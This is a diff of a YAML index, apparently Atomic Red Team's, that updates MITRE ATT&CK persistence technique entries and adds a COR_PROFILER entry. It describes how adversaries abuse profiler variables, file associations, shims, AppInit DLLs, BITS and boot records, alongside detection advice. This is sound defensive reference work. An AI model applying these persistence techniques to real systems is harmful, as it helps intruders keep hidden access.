+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
x_mitre_data_sources:
- Process command-line parameters
- File monitoring
- Windows Registry
- Process monitoring
- x_mitre_detection: |-
- Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1098.001:
technique:
@@ -8326,23 +8454,24 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-28T21:11:57.894Z'
+ modified: '2020-07-15T12:43:36.340Z'
created: '2020-01-19T16:10:15.008Z'
- x_mitre_platforms:
- - Azure AD
- - Azure
x_mitre_contributors:
+ - Oleg Kolesnikov, Securonix
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_data_sources:
- - Azure activity logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor Azure Activity Logs for service principal modifications.
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Azure activity logs
+ x_mitre_platforms:
+ - Azure AD
+ - Azure
atomic_tests: []
T1546.009:
technique:
@@ -8389,13 +8518,14 @@ persistence:
phase_name: persistence
modified: '2020-03-24T20:22:45.298Z'
created: '2020-01-24T14:47:41.795Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Windows Registry
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - Administrator
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: "Monitor DLL loads by processes, specifically looking for
DLLs that are not recognized or not normally loaded into a process. Monitor
the AppCertDLLs Registry value for modifications that do not correlate with
@@ -8409,14 +8539,13 @@ persistence:
but as part of a chain of behavior that could lead to other activities, such
as making network connections for Command and Control, learning details about
the environment through Discovery, and conducting Lateral Movement."
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_effective_permissions:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1546.010:
technique:
@@ -8468,13 +8597,15 @@ persistence:
phase_name: persistence
modified: '2020-03-24T20:34:09.996Z'
created: '2020-01-24T14:52:25.589Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Windows Registry
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Secure boot disabled on systems running Windows 8 and later
+ x_mitre_effective_permissions:
+ - Administrator
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: "Monitor DLL loads by processes that load user32.dll and
look for DLLs that are not recognized or not normally loaded into a process.
Monitor the AppInit_DLLs Registry values for modifications that do not correlate
@@ -8489,15 +8620,13 @@ persistence:
lead to other activities, such as making network connections for Command and
Control, learning details about the environment through Discovery, and conducting
Lateral Movement."
- x_mitre_permissions_required:
- - Administrator
- x_mitre_effective_permissions:
- - Administrator
- - SYSTEM
- x_mitre_system_requirements:
- - Secure boot disabled on systems running Windows 8 and later
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ x_mitre_platforms:
+ - Windows
identifier: T1546.010
atomic_tests:
- name: Install AppInit Shim
@@ -8561,6 +8690,10 @@ persistence:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Endgame Process Injection July 2017
+ - source_name: FireEye Application Shimming
+ url: http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf
+ description: Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved
+ May 4, 2020.
- url: https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
@@ -8593,9 +8726,9 @@ persistence:
Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH),
and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims
may allow an adversary to perform several malicious acts such as elevate privileges,
- install backdoors, disable defenses like Windows Defender, etc. Shims can
- also be abused to establish persistence by continuously being invoked by affected
- programs."
+ install backdoors, disable defenses like Windows Defender, etc. (Citation:
+ FireEye Application Shimming) Shims can also be abused to establish persistence
+ by continuously being invoked by affected programs."
id: attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83
type: attack-pattern
kill_chain_phases:
@@ -8603,14 +8736,12 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T21:28:29.648Z'
+ modified: '2020-05-04T19:05:30.140Z'
created: '2020-01-24T14:56:24.231Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):
@@ -8621,10 +8752,12 @@ persistence:
* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)
Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Windows Registry
+ x_mitre_platforms:
+ - Windows
identifier: T1546.011
atomic_tests:
- name: Application Shim Installation
@@ -8731,11 +8864,9 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-23T22:35:13.112Z'
created: '2019-12-03T12:59:36.749Z'
- x_mitre_platforms:
- - Linux
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
x_mitre_detection: "Monitor scheduled task creation using command-line invocation.
Legitimate scheduled tasks may be created during installation of new software
or through system administration functions. Look for changes to tasks that
@@ -8746,9 +8877,11 @@ persistence:
could lead to other activities, such as network connections made for Command
and Control, learning details about the environment through Discovery, and
Lateral Movement."
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
atomic_tests: []
T1053.002:
technique:
@@ -8803,8 +8936,16 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-24T13:43:40.776Z'
created: '2019-11-27T13:52:45.853Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
@@ -8820,16 +8961,8 @@ persistence:
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1053.002
atomic_tests:
- name: At.exe Scheduled task
@@ -8882,22 +9015,22 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T15:11:25.821Z'
created: '2020-01-24T14:54:42.757Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - Administrator
+ x_mitre_platforms:
+ - Windows
+ x_mitre_data_sources:
+ - DLL monitoring
+ - Windows Registry
+ - Loaded DLLs
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012
R2 may generate events when unsigned DLLs try to load into the LSA by setting
the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber
2014) (Citation: Microsoft Configure LSA)'
- x_mitre_data_sources:
- - DLL monitoring
- - Windows Registry
- - Loaded DLLs
- x_mitre_platforms:
- - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1197:
technique:
@@ -8957,31 +9090,31 @@ persistence:
phase_name: persistence
modified: '2020-03-25T23:28:10.049Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Ricardo Dias
- - Red Canary
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - Packet capture
- - Windows event logs
- x_mitre_defense_bypassed:
- - Firewall
- - Host forensic analysis
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
BITS runs as a service and its status can be checked with the Sc query utility (sc query bits). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose). (Citation: Microsoft BITS)
Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options) (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016)
Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). (Citation: Microsoft BITS)
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host forensic analysis
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
+ - Packet capture
+ - Windows event logs
+ x_mitre_contributors:
+ - Ricardo Dias
+ - Red Canary
+ x_mitre_version: '1.1'
identifier: T1197
atomic_tests:
- name: Bitsadmin Download (cmd)
@@ -9116,12 +9249,14 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T19:47:43.546Z'
+ modified: '2020-06-30T21:23:15.683Z'
created: '2020-01-23T17:46:59.535Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - root
x_mitre_detection: "Monitor for additions or modifications of mechanisms that
could be used to trigger autostart execution, such as relevant additions to
the Registry. Look for changes that are not correlated with known updates,
@@ -9140,12 +9275,10 @@ persistence:
Look for abnormal process behavior that may be due to a process loading a
malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line
parameters involved in kernel modification or driver installation."
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1037:
technique:
@@ -9179,19 +9312,19 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-27T16:49:15.953Z'
created: '2017-05-31T21:30:38.910Z'
- x_mitre_version: '2.0'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - macOS
+ - Windows
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
that could be indicative of abnormal programs or executables running upon
logon.
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ x_mitre_version: '2.0'
atomic_tests: []
T1542.003:
technique:
@@ -9199,10 +9332,10 @@ persistence:
- source_name: mitre-attack
external_id: T1542.003
url: https://attack.mitre.org/techniques/T1542/003
- - url: https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf
- description: Mandiant. (2016, February). M-Trends 2016. Retrieved January
- 4, 2017.
- source_name: MTrends 2016
+ - source_name: Mandiant M Trends 2016
+ url: https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
+ description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved
+ March 5, 2019.
- url: http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion
description: Lau, H. (2011, August 8). Are MBR Infections Back in Fashion?
(Infographic). Retrieved November 13, 2014.
@@ -9214,7 +9347,7 @@ persistence:
description: |-
Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
- A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
+ A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
id: attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba
@@ -9224,27 +9357,27 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-23T23:43:32.353Z'
+ modified: '2020-05-07T22:32:05.335Z'
created: '2019-12-19T21:05:38.123Z'
- x_mitre_platforms:
- - Linux
- - Windows
- x_mitre_data_sources:
- - VBR
- - MBR
- - API monitoring
- x_mitre_detection: Perform integrity checking on MBR and VBR. Take snapshots
- of MBR and VBR and compare against known good samples. Report changes to MBR
- and VBR as they occur for indicators of suspicious activity and further analysis.
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_defense_bypassed:
- Host intrusion prevention systems
- Anti-virus
- File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: Perform integrity checking on MBR and VBR. Take snapshots
+ of MBR and VBR and compare against known good samples. Report changes to MBR
+ and VBR as they occur for indicators of suspicious activity and further analysis.
+ x_mitre_data_sources:
+ - VBR
+ - MBR
+ - API monitoring
+ x_mitre_platforms:
+ - Linux
+ - Windows
atomic_tests: []
T1176:
technique:
@@ -9306,26 +9439,26 @@ persistence:
phase_name: persistence
modified: '2020-03-25T23:36:30.565Z'
created: '2018-01-16T16:13:52.465Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Justin Warner, ICEBRG
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
+
+ Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.
x_mitre_data_sources:
- Windows Registry
- File monitoring
- Process use of network
- Process monitoring
- Browser extensions
- x_mitre_detection: |-
- Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
-
- Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Justin Warner, ICEBRG
+ x_mitre_version: '1.1'
identifier: T1176
atomic_tests:
- name: Chrome (Developer Mode)
@@ -9394,8 +9527,121 @@ persistence:
2. Click 'Get'
name: manual
+ T1574.012:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1574.012
+ url: https://attack.mitre.org/techniques/T1574/012
+ - source_name: Microsoft Profiling Mar 2017
+ url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview
+ description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June
+ 24, 2020.
+ - source_name: Microsoft COR_PROFILER Feb 2013
+ url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)
+ description: Microsoft. (2013, February 4). Registry-Free Profiler Startup
+ and Attach. Retrieved June 24, 2020.
+ - source_name: RedCanary Mockingbird May 2020
+ url: https://redcanary.com/blog/blue-mockingbird-cryptominer/
+ description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved
+ May 26, 2020.
+ - source_name: Red Canary COR_PROFILER May 2020
+ url: https://redcanary.com/blog/cor_profiler-for-persistence/
+ description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation
+ for persistence. Retrieved June 24, 2020.
+ - source_name: Almond COR_PROFILER Apr 2019
+ url: https://offsec.almond.consulting/UAC-bypass-dotnet.html
+ description: Almond. (2019, April 30). UAC bypass via elevated .NET applications.
+ Retrieved June 24, 2020.
+ - source_name: GitHub OmerYa Invisi-Shell
+ url: https://github.com/OmerYa/Invisi-Shell
+ description: Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24,
+ 2020.
+ - source_name: subTee .NET Profilers May 2017
+ url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
+ description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
+ Profilers. Retrieved June 24, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: COR_PROFILER
+ description: |-
+ Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
+
+ The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
+
+ Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+ id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-26T16:09:58.920Z'
+ created: '2020-06-24T22:30:55.843Z'
+ x_mitre_detection: 'For detecting system and user scope abuse of the COR_PROFILER,
+ monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and
+ COR_PROFILER_PATH that correspond to system and user environment variables
+ that do not correlate to known developer tools. Extra scrutiny should be placed
+ on suspicious modification of these Registry keys by command line tools like
+ wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring
+ for command-line arguments indicating a change to COR_PROFILER variables may
+ aid in detection. For system, user, and process scope abuse of the COR_PROFILER,
+ monitor for new suspicious unmanaged profiling DLLs loading into .NET processes
+ shortly after the CLR causing abnormal process behavior.(Citation: Red Canary
+ COR_PROFILER May 2020) Consider monitoring for DLL files that are associated
+ with COR_PROFILER environment variables.'
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_contributors:
+ - Jesse Brown, Red Canary
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
T1546.001:
technique:
+ created: '2020-01-24T13:40:47.282Z'
+ modified: '2020-01-24T13:40:47.282Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ type: attack-pattern
+ id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c
+ description: "Adversaries may establish persistence by executing malicious content
+ triggered by a file type association. When a file is opened, the default program
+ used to open the file (also called the file association or handler) is checked.
+ File association selections are stored in the Windows Registry and can be
+ edited by users, administrators, or programs that have Registry access (Citation:
+ Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or
+ by administrators using the built-in assoc utility. (Citation: Microsoft Assoc
+ Oct 2017) Applications can modify the file association for a given file extension
+ to call an arbitrary program when a file with the given extension is opened.\n\nSystem
+ file associations are listed under HKEY_CLASSES_ROOT\\.[extension],
+ for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler
+ for that extension located at HKEY_CLASSES_ROOT\\[handler]. The
+ various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command.
+ For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n*
+ HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe
+ values of the keys listed are commands that are executed when the handler
+ opens the file extension. Adversaries can modify these values to continually
+ execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)"
+ name: Change Default File Association
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1546.001
@@ -9419,37 +9665,6 @@ persistence:
description: Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August
8, 2018.
source_name: TrendMicro TROJ-FAKEAV OCT 2012
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Change Default File Association
- description: "Adversaries may establish persistence by executing malicious content
- triggered by a file type association. When a file is opened, the default program
- used to open the file (also called the file association or handler) is checked.
- File association selections are stored in the Windows Registry and can be
- edited by users, administrators, or programs that have Registry access (Citation:
- Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or
- by administrators using the built-in assoc utility. (Citation: Microsoft Assoc
- Oct 2017) Applications can modify the file association for a given file extension
- to call an arbitrary program when a file with the given extension is opened.\n\nSystem
- file associations are listed under HKEY_CLASSES_ROOT\\.[extension],
- for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler
- for that extension located at HKEY_CLASSES_ROOT\\[handler]. The
- various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command.
- For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n*
- HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe
- values of the keys listed are commands that are executed when the handler
- opens the file extension. Adversaries can modify these values to continually
- execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)"
- id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: persistence
- modified: '2020-01-24T13:40:47.282Z'
- created: '2020-01-24T13:40:47.282Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -9537,28 +9752,28 @@ persistence:
phase_name: persistence
modified: '2020-03-24T12:44:27.995Z'
created: '2020-01-29T17:32:30.711Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: Collect usage logs from cloud user and administrator accounts
+ to identify unusual activity in the creation of new accounts and assignment
+ of roles to those accounts. Monitor for accounts assigned to admin roles that
+ go over a certain threshold of known admins.
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - Stackdriver logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_contributors:
+ - Praetorian
+ - Microsoft Threat Intelligence Center (MSTIC)
x_mitre_platforms:
- AWS
- GCP
- Azure
- Office 365
- Azure AD
- x_mitre_contributors:
- - Praetorian
- - Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_data_sources:
- - Office 365 audit logs
- - Stackdriver logs
- - Azure activity logs
- - AWS CloudTrail logs
- x_mitre_detection: Collect usage logs from cloud user and administrator accounts
- to identify unusual activity in the creation of new accounts and assignment
- of roles to those accounts. Monitor for accounts assigned to admin roles that
- go over a certain threshold of known admins.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1078.004:
technique:
@@ -9599,6 +9814,19 @@ persistence:
phase_name: initial-access
modified: '2020-03-23T21:59:36.729Z'
created: '2020-03-13T20:36:57.378Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
+ or malicious activity, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -9606,19 +9834,6 @@ persistence:
- SaaS
- Azure AD
- Office 365
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1542.002:
technique:
@@ -9654,27 +9869,27 @@ persistence:
phase_name: defense-evasion
modified: '2020-03-23T23:48:33.904Z'
created: '2019-12-19T20:21:21.669Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Ability to update component device firmware from the host operating system.
+ x_mitre_permissions_required:
+ - SYSTEM
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host intrusion prevention systems
